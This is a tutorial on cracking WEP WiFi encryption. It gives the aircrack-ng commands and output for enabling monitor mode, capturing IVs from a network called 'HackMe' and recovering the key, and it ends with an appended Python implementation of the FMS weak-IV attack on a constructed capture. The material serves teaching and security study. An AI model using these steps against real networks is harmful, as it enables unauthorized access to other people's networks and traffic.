Cracking WEP

Make sure you've completed the initial setup before continuing to use the commands on the rest of this page.

Most of these commands need root. Older Kali releases log you in as root by default; on current Kali (which defaults to a non-root user) or any other distribution, prefix each command with sudo or switch to a root shell first.

Enable Monitor Mode

You need to enable monitor mode on your wireless interface in order for it to send and receive the packets required for the rest of the attack.

See what devices you have on your system with:

# airmon-ng
PHY	    Interface	Driver		Chipset
phy0	wlo1		iwlwifi		Intel Corporation Wireless 7260 (rev 73)

Our WiFi card is the wlo1 interface, so that is the interface we need to put into monitor mode.

# airmon-ng start wlo1
PHY	    Interface	Driver		Chipset
phy0	wlo1		iwlwifi		Intel Corporation Wireless 7260 (rev 73)

          (mac80211 monitor mode vif enabled for [phy0]wlo1 on [phy0]wlo1mon)
          (mac80211 station mode vif disabled for [phy0]wlo1)

You might get a warning saying Found 5 processes that could cause trouble. Usually everything works fine anyway, but if the interface keeps dropping out of monitor mode or the capture below shows nothing, the likely culprits are NetworkManager and wpa_supplicant. Run airmon-ng check kill to stop them (this disconnects you from any WiFi network until you restart them) and then start monitor mode again.

Now if you list the interfaces again:

# airmon-ng
PHY  	Interface	Driver		Chipset
phy0	wlo1mon		iwlwifi		Intel Corporation Wireless 7260 (rev 73)

Notice how the interface name has changed from wlo1 to wlo1mon. Now we're ready to start investigating our target WiFi network.

Scan Surrounding Networks

After we've set up our WiFi interface, we need to scan for our target WiFi network to determine its ESSID and the channel it's broadcasting on.

Run the following command and it will channel-hop, looking for available networks and retrieving information about them. Once your target network shows up you can stop the scan with Ctrl-c. In this snippet, irrelevant data has been cut out and replaced with [...]; you will likely see quite a few networks here.

# airodump-ng wlo1mon
 CH  X ][ Elapsed: 0 s ][ 2017-01-01 00:00                                        
                                                                                                                                                                       
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                       
 [...]                                                                                 
 00:18:4D:67:1C:84  -38        5        0    0  11  54 . WEP  WEP         HackMe
 [...]                                                                                    
                                                                                                                                              
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 [...]

From this, what we're interested in is the BSSID, CH, ENC/CIPHER and ESSID columns.

The BSSID (the access point's MAC address) and ESSID (the network name) both identify our target network. In this guide we'll use the ESSID, but the BSSID works just as well and is the safer choice when several access points share a name: airodump-ng takes it with --bssid and aircrack-ng with -b instead of -e.

The CH value is the radio channel the target network is broadcasting on. We'll lock the capture to this channel later so that airodump-ng stops channel-hopping and sees every frame the target sends.

The ENC and CIPHER values show how the network protects access and traffic. For this guide both need to be WEP, as we're focusing on attacking WEP networks; the attack below does not apply to WPA or WPA2.

Capturing Data

Now we know all the data we need to perform our attack on the network. The attack is statistical: every WEP data frame carries a 24-bit initialisation vector (IV) in the clear, and aircrack-ng recovers the key from a large number of frames with distinct IVs. So some data needs to be in transmission over the network; if no one is connected, this passive approach won't work. In most cases someone will be connected and transmitting some kind of data. (The aircrack-ng suite's aireplay-ng can replay captured ARP frames to force the access point to generate traffic, but that is outside the scope of this page.)

We need to sniff the traffic going across the network and save it to a file so we can then crack the WEP key later using aircrack-ng. You need to capture a reasonable amount of data for this to work. Leave it running until the #Data value is above around 64k. You can probably get away with less (the PTW attack often succeeds with a few tens of thousands of IVs), but if the next step doesn't work, come back to this step and leave it a little longer.

# airodump-ng wlo1mon --ivs --channel 11 --essid HackMe -w wep-cracking

 CH 11 ][ Elapsed: 32 s ][ 2017-01-01 00:00                                        
                                                                                                                                                                       
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                       
 00:18:4D:67:1C:84  -41 100      390    99003 2756  11  54 . WEP  WEP         HackMe                                                                     
                                                                                                                                                                       
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                             
                                                                                                                                                                       
 [...]

This starts dumping data to the file wep-cracking-01.ivs (the -01 suffix increases if you run the command again with the same name). With --ivs only the IVs and keystream material needed for cracking are saved, which keeps the file small; leave that option out if you also want a full .cap capture, for example to decrypt the traffic with airdecap-ng once you have the key.

Cracking the Key

We now have all we need to crack the WEP key from our data file.

# aircrack-ng -e HackMe wep-cracking-01.ivs 
Opening wep-cracking-01.ivs
Read 99355 packets.

Opening wep-cracking-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 99354 ivs.
                     KEY FOUND! [ 00:00:00:00:00 ] (ASCII: ..... )
	Decrypted correctly: 100%

And there it is, our WEP key: 00:00:00:00:00. The five bytes mean this network used a 40-bit (64-bit) key; a 104-bit (128-bit) key would show up as 13 bytes. The Decrypted correctly: 100% line is aircrack-ng's sanity check that the recovered key decrypts every captured packet, so a lower figure means the key is wrong or the capture is mixed with another network's traffic. To connect, use the hex digits without the colons (0000000000). Simple, right?
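To show what aircrack-ng is doing with all those IVs during the capture and cracking steps above, here is an added example that is not part of the original page or of the aircrack-ng suite: a small pure-Python WEP key recovery. aircrack-ng used the PTW attack in the output above; this example implements the older FMS weak-IV attack instead, because it fits in a few dozen lines and illustrates the same principle, namely that each captured IV casts a statistical vote for a key byte, which is why the attack needs a large #Data count and is "restarted every 5000 captured ivs". The capture is constructed in code (one frame per classic FMS weak IV of the form (A+3, 255, X)), the 40-bit key 1f2e3d4c5b is an arbitrary demo value, and the top-3 candidate search with verification mirrors aircrack-ng's fudge factor rather than its actual code.

```python
"""WEP key recovery with the FMS weak-IV attack on a constructed capture.

Added example for illustration; not from the page or from aircrack-ng.
"""
from collections import Counter

N = 256
SNAP_FIRST_BYTE = 0xAA  # every WEP data frame starts with the LLC/SNAP header AA AA 03 ...


def rc4_ksa(key, steps=None):
    """RC4 key scheduling. With `steps`, stop early and return the partial (S, j)."""
    S = list(range(N))
    j = 0
    for i in range(N if steps is None else steps):
        j = (j + S[i] + key[i % len(key)]) % N
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_first_byte(key):
    """First keystream byte of RC4 under `key`; FMS only ever needs this byte."""
    S, _ = rc4_ksa(key)
    i, j = 1, S[1]
    S[i], S[j] = S[j], S[i]
    return S[(S[i] + S[j]) % N]


def wep_encrypt_first_byte(iv, secret_key):
    """WEP's per-packet RC4 key is IV || secret key. Return (iv, first ciphertext byte)."""
    iv = bytes(iv)
    return iv, SNAP_FIRST_BYTE ^ rc4_first_byte(iv + secret_key)


def capture_weak_ivs(secret_key):
    """Constructed 'capture': one frame for each classic weak IV (A+3, 255, X)."""
    return [wep_encrypt_first_byte((a + 3, 255, x), secret_key)
            for a in range(len(secret_key)) for x in range(N)]


def fms_votes(packets, known_prefix):
    """Vote for secret key byte number len(known_prefix) using every 'resolved' IV."""
    a = len(known_prefix)
    votes = Counter()
    for iv, c0 in packets:
        # Simulate the KSA over the bytes we know: the 3 IV bytes plus recovered key bytes.
        S, j = rc4_ksa(iv + bytes(known_prefix), steps=a + 3)
        # FMS 'resolved' condition: S[0], S[1] set up so the first output byte leaks S[a+3].
        if S[1] < a + 3 and (S[1] + S[S[1]]) % N == a + 3:
            z = c0 ^ SNAP_FIRST_BYTE          # first keystream byte, thanks to the known SNAP header
            votes[(S.index(z) - j - S[a + 3]) % N] += 1
    return votes


def verify(secret_key, packets):
    """aircrack-ng's 'Decrypted correctly' check: the key must explain every first byte."""
    return all(c0 == SNAP_FIRST_BYTE ^ rc4_first_byte(iv + secret_key) for iv, c0 in packets)


def recover_key(packets, key_len=5, fudge=3):
    """Depth-first search over the top-`fudge` vote winners per byte (a 'fudge factor'),
    accepting a candidate key only once it verifies against the whole capture."""
    def search(prefix):
        if len(prefix) == key_len:
            key = bytes(prefix)
            return key if verify(key, packets) else None
        for guess, _ in fms_votes(packets, prefix).most_common(fudge):
            found = search(prefix + [guess])
            if found is not None:
                return found
        return None
    return search([])


if __name__ == "__main__":
    key = bytes.fromhex("1f2e3d4c5b")   # arbitrary demo key, not the one from the page
    packets = capture_weak_ivs(key)
    print("captured", len(packets), "weak-IV frames")
    recovered = recover_key(packets)
    print("KEY FOUND!", ":".join(f"{b:02x}" for b in recovered) if recovered else "none")
```

Only around 5% of the resolved IVs actually vote for the correct byte; the rest are effectively random noise spread over 256 values, so the right byte only stands out once enough IVs have been collected. That is the whole reason the capture step above has to run until #Data is large, and why a real capture, which contains far fewer weak IVs than this constructed one, needs tens of thousands of frames before PTW (which squeezes more out of each IV than FMS) can finish.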